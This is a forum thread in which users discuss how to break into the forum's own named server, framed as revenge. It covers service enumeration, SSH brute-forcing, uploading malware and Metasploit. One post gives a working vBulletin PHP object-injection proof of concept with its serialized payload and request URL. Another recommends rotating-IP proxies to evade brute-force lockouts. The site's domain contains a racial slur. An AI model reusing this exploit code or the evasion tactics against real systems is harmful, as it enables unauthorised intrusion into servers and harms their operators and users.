2017-02-01 at 12:18 AM UTC
Let's say hypothetically, that I was on a mission to attack niggasin.space. Lanny had rubbed me the wrong way(sexually) and I was going after his server for revenge. If I didn't want to attack his site via a potential web application vulnerability, what other options would I have?
Let's split the question and say in one scenario that he had a bunch of port open(like 22, 25,X 80, 443, 631...all were for the default protocol), and the other scenario he only had 80 and 443 open.
2017-02-01 at 12:23 AM UTC
DDOS and 10 trillion spambots.
2017-02-01 at 12:52 AM UTC
^Oh gawd.
New rule, no DOS type attacks. Actual, real attacks that require at least a small amount of skill.
2017-02-01 at 1:14 AM UTC
I think I found my answer. It looks like I would have to find a vulnerability for what ever service is running on that particular port.
Is it a dead end if Lanny open had port 80 open?
2017-02-01 at 1:16 AM UTC
Attack the services running on the webserver. Like FTP, POP3, the mailserver. Sometimes the MySQL DB listens on port 3306. You could bruteforce the file server and upload malware. Or see if there is a flaw in the service you are targeting itself that can be exploited with a buffer overflow or what have you. This is why it is important to enumerate the type of service you are dealing with and the version. One such technique involves banner grabbing with the FTP service to get the version and such. Once you know the version you can look for vulnerabilities on exploit-db and similar sites. Or download the exact same thing run it locally and bang on it/reverse engineer until you find something.
Nexpose and Metasploit are really good at server side security testing.
The following users say it would be alright if the author of this
post didn't die in a fire!
2017-02-01 at 2:20 AM UTC
Guess I'm going to have to start learning about some these tools(Metasploit specifically). Bufferoverflows as well.
2017-02-01 at 4:28 AM UTC
-SpectraL
coward
[the spuriously bluish-lilac bushman]
php << 'eof'
<?php
class vB_Database {
public $functions = array();
public function __construct()
{
$this->functions['free_result'] = 'phpinfo';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
$this->db = new vB_Database();
$this->recordset = 1;
}
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D
The following users say it would be alright if the author of this
post didn't die in a fire!
2017-02-01 at 8:53 AM UTC
Yeah, every attack has to be against some kind of service. Obviously an HTTP server is available on 80. Most servers will run SSH on 22 because for people like me, who rent a server in someone else's data center, it's literally the only way I can connect. Here at niggasin.space we allow ICMP connections and TCP connections on 22, 80, 443, everything else is firewalled from anywhere but the DB server and localhost. Nothing runs on 443, 80 is NGINX and uWSGI and 22 is sshd. Low hanging fruit is someone leaving password login for root or a sudoer enabled so you can brute force SSH login. No dice in this case because you'll get a blanket ban on incoming connections with like 8 failures and you can only do key based auth, but that would be the usual initial strat.
Following that there's a much higher chance of there being a critical bug in my homebrewed forum code which you can read in its entirety than in sshd which is also open source but far better reviewed.
2017-02-01 at 3:10 PM UTC
-SpectraL
coward
[the spuriously bluish-lilac bushman]
That's why you use a "rotating IP" proxy, so you always have a different IP on every attempted connection.
2017-02-01 at 4:35 PM UTC
-SpectraL
coward
[the spuriously bluish-lilac bushman]
Warning, though. Many "tools" have hidden author backdoors embedded in them. You play with matches, sometimes you get burnt.
2017-02-01 at 5:06 PM UTC
-SpectraL
coward
[the spuriously bluish-lilac bushman]
Some "tools" also have intelligent capabilities, whereupon if the tool detects certain people, in certain places, at certain times, under certain circumstances, it will completely fry the user's entire system and self-destruct, so beware.
